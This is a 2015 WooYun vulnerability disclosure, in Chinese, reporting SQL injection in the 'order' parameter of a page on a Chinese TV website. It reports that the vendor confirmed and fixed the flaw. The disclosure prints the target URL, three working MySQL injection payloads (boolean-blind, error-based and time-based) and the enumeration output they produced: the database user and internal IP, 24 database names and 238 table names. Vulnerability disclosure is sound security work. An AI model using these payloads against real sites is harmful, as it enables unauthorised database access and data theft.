当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135660

漏洞标题:云视某站SQL注射漏洞

相关厂商:cdvcloud.com

漏洞作者: 路人甲

提交时间:2015-08-20 17:28

修复时间:2015-10-05 10:16

公开时间:2015-10-05 10:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-21: 厂商已经确认,细节仅向厂商公开
2015-08-31: 细节向核心白帽子及相关领域专家公开
2015-09-10: 细节向普通白帽子公开
2015-09-20: 细节向实习白帽子公开
2015-10-05: 细节向公众公开

简要描述:

RT

详细说明:

http://www.hktv.tv/e/extend/say/p_index.php?classid=88&id=347&num=5&order=1&sub=60
参数 order

漏洞证明:

Parameter: order (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: classid=88&id=347&num=5&order=1 RLIKE (SELECT (CASE WHEN (5751=5751) THEN 1 ELSE 0x28 END))&sub=60
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: classid=88&id=347&num=5&order=1 AND (SELECT 2695 FROM(SELECT COUNT(*),CONCAT(0x716b6b7a71,(SELECT (ELT(2695=2695,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sub=60
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: classid=88&id=347&num=5&order=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FfrU)&sub=60
---
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0
current user: 'bjxaty@10.122.76.132:52156'
current user is DBA: False
available databases [24]:
[*] bbs_hktv
[*] cdp
[*] cms_as
[*] cms_hktv
[*] information_schema
[*] jsbc-security
[*] meicam
[*] mysql
[*] odp
[*] onairfastedit
[*] onairtranscode
[*] ors
[*] performance_schema
[*] security_as
[*] security_hktv
[*] security_hn
[*] vms
[*] vms_as
[*] vms_hktv
[*] vms_jyg
[*] vms_sjs
[*] wechat_hn
[*] wechat_sjs
[*] yicloud_aliyun_rds_dummy_database
Database: cms_hktv
[238 tables]
+------------------------------+
| hks_ecms_article |
| hks_ecms_article_check |
| hks_ecms_article_check_data |
| hks_ecms_article_data_1 |
| hks_ecms_article_doc |
| hks_ecms_article_doc_data |
| hks_ecms_article_doc_index |
| hks_ecms_article_index |
| hks_ecms_download |
| hks_ecms_download_check |
| hks_ecms_download_check_data |
| hks_ecms_download_data_1 |
| hks_ecms_download_doc |
| hks_ecms_download_doc_data |
| hks_ecms_download_doc_index |
| hks_ecms_download_index |
| hks_ecms_flash |
| hks_ecms_flash_check |
| hks_ecms_flash_check_data |
| hks_ecms_flash_data_1 |
| hks_ecms_flash_doc |
| hks_ecms_flash_doc_data |
| hks_ecms_flash_doc_index |
| hks_ecms_flash_index |
| hks_ecms_info |
| hks_ecms_info_check |
| hks_ecms_info_check_data |
| hks_ecms_info_data_1 |
| hks_ecms_info_doc |
| hks_ecms_info_doc_data |
| hks_ecms_info_doc_index |
| hks_ecms_info_index |
| hks_ecms_infoclass_article |
| hks_ecms_infoclass_download |
| hks_ecms_infoclass_flash |
| hks_ecms_infoclass_info |
| hks_ecms_infoclass_movie |
| hks_ecms_infoclass_news |
| hks_ecms_infoclass_photo |
| hks_ecms_infoclass_shop |
| hks_ecms_infotmp_article |
| hks_ecms_infotmp_download |
| hks_ecms_infotmp_flash |
| hks_ecms_infotmp_info |
| hks_ecms_infotmp_movie |
| hks_ecms_infotmp_news |
| hks_ecms_infotmp_photo |
| hks_ecms_infotmp_shop |
| hks_ecms_movie |
| hks_ecms_movie_check |
| hks_ecms_movie_check_data |
| hks_ecms_movie_data_1 |
| hks_ecms_movie_doc |
| hks_ecms_movie_doc_data |
| hks_ecms_movie_doc_index |
| hks_ecms_movie_index |
| hks_ecms_news |
| hks_ecms_news_check |
| hks_ecms_news_check_data |
| hks_ecms_news_data_1 |
| hks_ecms_news_doc |
| hks_ecms_news_doc_data |
| hks_ecms_news_doc_index |
| hks_ecms_news_index |
| hks_ecms_photo |
| hks_ecms_photo_check |
| hks_ecms_photo_check_data |
| hks_ecms_photo_data_1 |
| hks_ecms_photo_doc |
| hks_ecms_photo_doc_data |
| hks_ecms_photo_doc_index |
| hks_ecms_photo_index |
| hks_ecms_shop |
| hks_ecms_shop_check |
| hks_ecms_shop_check_data |
| hks_ecms_shop_data_1 |
| hks_ecms_shop_doc |
| hks_ecms_shop_doc_data |
| hks_ecms_shop_doc_index |
| hks_ecms_shop_index |
| hks_enewsad |
| hks_enewsadclass |
| hks_enewsadminstyle |
| hks_enewsbefrom |
| hks_enewsbq |
| hks_enewsbqclass |
| hks_enewsbqtemp |
| hks_enewsbqtempclass |
| hks_enewsbuybak |
| hks_enewsbuygroup |
| hks_enewscard |
| hks_enewsclass |
| hks_enewsclass_stats |
| hks_enewsclass_stats_ip |
| hks_enewsclass_stats_set |
| hks_enewsclassadd |
| hks_enewsclassf |
| hks_enewsclassnavcache |
| hks_enewsclasstemp |
| hks_enewsclasstempclass |
| hks_enewsdiggips |
| hks_enewsdo |
| hks_enewsdolog |
| hks_enewsdownerror |
| hks_enewsdownrecord |
| hks_enewsdownurlqz |
| hks_enewserrorclass |
| hks_enewsf |
| hks_enewsfava |
| hks_enewsfavaclass |
| hks_enewsfeedback |
| hks_enewsfeedbackclass |
| hks_enewsfeedbackf |
| hks_enewsfile_1 |
| hks_enewsfile_member |
| hks_enewsfile_other |
| hks_enewsfile_public |
| hks_enewsgbook |
| hks_enewsgbookclass |
| hks_enewsgfenip |
| hks_enewsgroup |
| hks_enewshmsg |
| hks_enewshnotice |
| hks_enewshy |
| hks_enewshyclass |
| hks_enewsindexpage |
| hks_enewsinfoclass |
| hks_enewsinfotype |
| hks_enewsinfovote |
| hks_enewsjstemp |
| hks_enewsjstempclass |
| hks_enewskey |
| hks_enewskeyclass |
| hks_enewslink |
| hks_enewslinkclass |
| hks_enewslinktmp |
| hks_enewslisttemp |
| hks_enewslisttempclass |
| hks_enewslog |
| hks_enewsloginfail |
| hks_enewsmember |
| hks_enewsmember_connect |
| hks_enewsmember_connect_app |
| hks_enewsmemberadd |
| hks_enewsmemberf |
| hks_enewsmemberfeedback |
| hks_enewsmemberform |
| hks_enewsmembergbook |
| hks_enewsmembergroup |
| hks_enewsmemberpub |
| hks_enewsmenu |
| hks_enewsmenuclass |
| hks_enewsmod |
| hks_enewsnewstemp |
| hks_enewsnewstempclass |
| hks_enewsnotcj |
| hks_enewsnotice |
| hks_enewspage |
| hks_enewspageclass |
| hks_enewspagetemp |
| hks_enewspayapi |
| hks_enewspayrecord |
| hks_enewspic |
| hks_enewspicclass |
| hks_enewspl_1 |
| hks_enewspl_set |
| hks_enewsplayer |
| hks_enewsplf |
| hks_enewspltemp |
| hks_enewspostdata |
| hks_enewspostserver |
| hks_enewsprinttemp |
| hks_enewspublic |
| hks_enewspublic_update |
| hks_enewspubtemp |
| hks_enewspubvar |
| hks_enewspubvarclass |
| hks_enewsqmsg |
| hks_enewssearch |
| hks_enewssearchall |
| hks_enewssearchall_load |
| hks_enewssearchtemp |
| hks_enewssearchtempclass |
| hks_enewsshop_address |
| hks_enewsshop_ddlog |
| hks_enewsshop_precode |
| hks_enewsshop_set |
| hks_enewsshopdd |
| hks_enewsshopdd_add |
| hks_enewsshoppayfs |
| hks_enewsshopps |
| hks_enewssp |
| hks_enewssp_1 |
| hks_enewssp_2 |
| hks_enewssp_3 |
| hks_enewssp_3_bak |
| hks_enewsspacestyle |
| hks_enewsspclass |
| hks_enewssql |
| hks_enewstable |
| hks_enewstags |
| hks_enewstagsclass |
| hks_enewstagsdata |
| hks_enewstask |
| hks_enewstempbak |
| hks_enewstempdt |
| hks_enewstempgroup |
| hks_enewstempvar |
| hks_enewstempvarclass |
| hks_enewstogzts |
| hks_enewsuser |
| hks_enewsuseradd |
| hks_enewsuserclass |
| hks_enewsuserjs |
| hks_enewsuserjsclass |
| hks_enewsuserlist |
| hks_enewsuserlistclass |
| hks_enewsuserloginck |
| hks_enewsvote |
| hks_enewsvotemod |
| hks_enewsvotetemp |
| hks_enewswapstyle |
| hks_enewswfinfo |
| hks_enewswfinfolog |
| hks_enewswords |
| hks_enewsworkflow |
| hks_enewsworkflowitem |
| hks_enewswriter |
| hks_enewsyh |
| hks_enewszt |
| hks_enewsztadd |
| hks_enewsztclass |
| hks_enewsztf |
| hks_enewsztinfo |
| hks_enewszttype |
| hks_enewszttypeadd |
| hks_tv |
| hks_tv_playlist |
+------------------------------+

修复方案:

~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-21 10:14

厂商回复:

已修改

最新状态:

暂无